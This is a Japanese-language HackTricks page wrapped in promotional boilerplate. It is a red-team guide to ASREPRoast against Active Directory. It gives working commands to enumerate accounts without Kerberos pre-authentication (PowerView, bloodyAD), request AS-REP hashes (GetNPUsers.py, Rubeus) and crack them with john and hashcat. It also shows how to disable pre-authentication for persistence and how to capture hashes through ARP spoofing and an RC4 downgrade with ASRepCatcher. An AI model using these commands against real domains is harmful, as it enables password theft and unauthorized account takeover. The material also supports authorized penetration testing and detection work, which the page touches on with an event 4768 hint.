8.8 KiB
ASREPRoast
ゼロからヒーローまでAWSハッキングを学ぶ htARTE(HackTricks AWS Red Team Expert)!
HackTricks をサポートする他の方法:
- HackTricks で企業を宣伝したいまたはHackTricks をPDFでダウンロードしたい場合は、SUBSCRIPTION PLANSをチェックしてください!
- 公式PEASS&HackTricksグッズを入手する
- The PEASS Familyを発見し、独占的なNFTsコレクションを見る
- **💬 Discordグループに参加するか、telegramグループに参加するか、Twitter 🐦 @carlospolopmをフォローする。
- ハッキングトリックを共有するには、PRを HackTricks と HackTricks Cloud のGitHubリポジトリに提出してください。
経験豊富なハッカーやバグバウンティハンターとコミュニケーションを取るためにHackenProof Discord サーバーに参加しましょう!
ハッキングの洞察
ハッキングのスリルとチャレンジに深く入り込むコンテンツに参加しましょう
リアルタイムハックニュース
リアルタイムのニュースと洞察を通じて、ハッキングの世界の速いペースについていきましょう
最新の発表
最新のバグバウンティの開始や重要なプラットフォームの更新について情報を得ましょう
**Discord に参加して、今日からトップハッカーと協力しましょう!
ASREPRoast
ASREPRoast は、Kerberos事前認証が必要な属性を持たないユーザーを標的とするセキュリティ攻撃です。基本的に、この脆弱性により、攻撃者はユーザーのパスワードを必要とせずに、ドメインコントローラー(DC)からユーザーの認証をリクエストできます。その後、DCは、ユーザーのパスワード由来のキーで暗号化されたメッセージで応答し、攻撃者はオフラインでユーザーのパスワードを発見するためにクラックを試みることができます。
この攻撃の主な要件は次のとおりです:
- Kerberos事前認証の不足: 対象ユーザーは、このセキュリティ機能が有効になっていない必要があります。
- ドメインコントローラー(DC)への接続: 攻撃者は、リクエストを送信し、暗号化されたメッセージを受信するためにDCへのアクセスが必要です。
- オプションのドメインアカウント: ドメインアカウントを持っていると、LDAPクエリを使用して脆弱なユーザーを効率的に特定できます。このようなアカウントがない場合、攻撃者はユーザー名を推測する必要があります。
脆弱なユーザーの列挙(ドメイン資格情報が必要)
Get-DomainUser -PreauthNotRequired -verbose #List vuln users using PowerView
{% endcode %}
{% code title="Linuxを使用する" %}
bloodyAD -u user -p 'totoTOTOtoto1234*' -d crash.lab --host 10.100.10.5 get search --filter '(&(userAccountControl:1.2.840.113556.1.4.803:=4194304)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))' --attr sAMAccountName
{% endcode %}
AS_REPメッセージのリクエスト
{% code title="Linuxを使用する" %}
#Try all the usernames in usernames.txt
python GetNPUsers.py jurassic.park/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast
#Use domain creds to extract targets and target them
python GetNPUsers.py jurassic.park/triceratops:Sh4rpH0rns -request -format hashcat -outputfile hashes.asreproast
{% endcode %}
{% code title="Windowsを使用する" %}
.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.asreproast [/user:username]
Get-ASREPHash -Username VPN114user -verbose #From ASREPRoast.ps1 (https://github.com/HarmJ0y/ASREPRoast)
{% endcode %}
{% hint style="warning" %} Rubeusを使用したAS-REP Roastingは、暗号化タイプが0x17で事前認証タイプが0の4768を生成します。 {% endhint %}
クラッキング
john --wordlist=passwords_kerb.txt hashes.asreproast
hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt
持続性
GenericAll 権限(またはプロパティを書き込む権限)を持つユーザーに対して preauth を必要としないように強制します:
{% code title="Windows を使用する" %}
Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -Verbose
{% endcode %}
{% code title="Linuxを使用する" %}
bloodyAD -u user -p 'totoTOTOtoto1234*' -d crash.lab --host 10.100.10.5 add uac -f DONT_REQ_PREAUTH
{% endcode %}
資格情報なしでのASREProast
攻撃者は、Kerberos事前認証が無効になっている必要がない状態で、中間者攻撃を使用して、ネットワークを通過するAS-REPパケットをキャプチャすることができます。したがって、これはVLAN上のすべてのユーザーに対して機能します。
ASRepCatcherを使用すると、これを行うことができます。さらに、このツールは、Kerberosのネゴシエーションを変更して、クライアントワークステーションにRC4を使用させるように強制します。
# Actively acting as a proxy between the clients and the DC, forcing RC4 downgrade if supported
ASRepCatcher relay -dc $DC_IP
# Disabling ARP spoofing, the mitm position must be obtained differently
ASRepCatcher relay -dc $DC_IP --disable-spoofing
# Passive listening of AS-REP packets, no packet alteration
ASRepCatcher listen
参考文献
HackenProof Discord サーバーに参加して、経験豊富なハッカーやバグバウンティハンターとコミュニケーションを取りましょう!
ハッキングの洞察
ハッキングのスリルとチャレンジに深く入り込むコンテンツに参加しましょう
リアルタイムハックニュース
リアルタイムのニュースと洞察を通じて、ハッキングの世界を追いかけましょう
最新のお知らせ
最新のバグバウンティの開始や重要なプラットフォームのアップデートについて知っておきましょう
Discord に参加して、今日からトップハッカーと協力を始めましょう!
**ゼロからヒーローまでのAWSハッキングを学ぶ** htARTE(HackTricks AWS Red Team Expert)!
HackTricks をサポートする他の方法:
- HackTricks で企業を宣伝したい または HackTricks をPDFでダウンロードしたい場合は SUBSCRIPTION PLANS をチェックしてください!
- 公式PEASS&HackTricksのグッズを入手する
- The PEASS Family を発見し、独占的な NFTs のコレクションを見つける
- 💬 Discord グループ または telegram グループ に参加するか、Twitter 🐦 @carlospolopm をフォローする。**
- ハッキングトリックを共有するために、 HackTricks と HackTricks Cloud の GitHub リポジトリに PR を提出する。